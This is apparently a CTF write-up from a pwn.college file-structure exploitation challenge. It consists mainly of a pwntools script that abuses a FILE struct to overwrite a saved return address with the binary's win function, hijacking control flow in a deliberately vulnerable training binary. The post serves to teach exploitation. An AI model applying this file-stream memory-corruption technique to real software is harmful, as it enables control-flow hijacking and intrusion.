Post

(File Struct Exploits) level 4

Posted
By hackeringtrue
1 min read
(File Struct Exploits) level 4

Information

  • category: pwn

Description

Harness the power of FILE structs to arbitrarily read/write data to hijack control flow.

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

from pwn import *

elf = context.binary = ELF("/challenge/babyfile_level4")
global p
p = elf.process()

def exploit():
    p.recvuntil(b"stored at: ")
    ret_address = int(p.recvline()[:-1],16)

    fp = FileStructure()
    payload = fp.read(ret_address,266)
    p.send(payload)
    p.send(p64(elf.sym['win']) + b"\x00"*258)
    p.interactive()
    
def main():
    exploit()

if __name__ == "__main__":
    main()
pwn.college, File-Struct-Exploits
pwn.college FSOP
This post is licensed under CC BY 4.0 by the author.